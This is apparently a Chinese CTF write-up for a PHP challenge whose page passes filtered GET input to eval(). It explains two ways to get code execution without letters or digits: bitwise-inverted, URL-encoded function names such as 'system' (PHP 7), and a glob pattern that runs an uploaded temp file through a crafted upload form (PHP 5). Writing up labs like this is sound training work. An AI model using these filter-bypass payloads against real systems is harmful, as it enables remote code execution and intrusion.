<?php
if(isset($_GET['code'])){
$code = $_GET['code'];
if(strlen($code)>35){
die("Long.");
}
if(preg_match("/[A-Za-z0-9_$]+/",$code)){
die("NO.");
}
eval($code);
}else{
highlight_file(__FILE__);
}
限制:
1.webshell长度不超过35
2.正则过滤掉了数字字母还有$和_
php7环境:
取反
php中'~'表示取反,而取反之后大都是不可见字符
<?php
var_dump(urlencode(~'system'));
取反后的值为%8C%86%8C%8B%9A%92
解码:
<?php
var_dump(urlencode(~'phpinfo'));
答案如下:
php5环境:
通配符
用通配符来进行匹配,无法准确匹配
但我们要继续通配符
[^a]表示这里不为a
[0-9]表示0-9这个范围
而注意到linux中文件基本都是小写,我们上传的文件中后几位是随机的,可能包含大写,所以我们就只需要利用[]表示出大写字母就可以了
在ascii表中,大写字母处于@-[之间,所以很明确了,使用/???/???????[@-[]来进行匹配
执行:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
</head>
<body>
<form action="web.php" method="post" enctype="multipart/form-data">
<input type="file" name="file" id="">
<input type="submit" value="submit">
</form>
</body>
</html>
写一个form表单上传文件到web.php,使用bp抓包,抓一个上传文件的包和web.php的包
把第一个包的post内容放入web.php中
发送请求
结束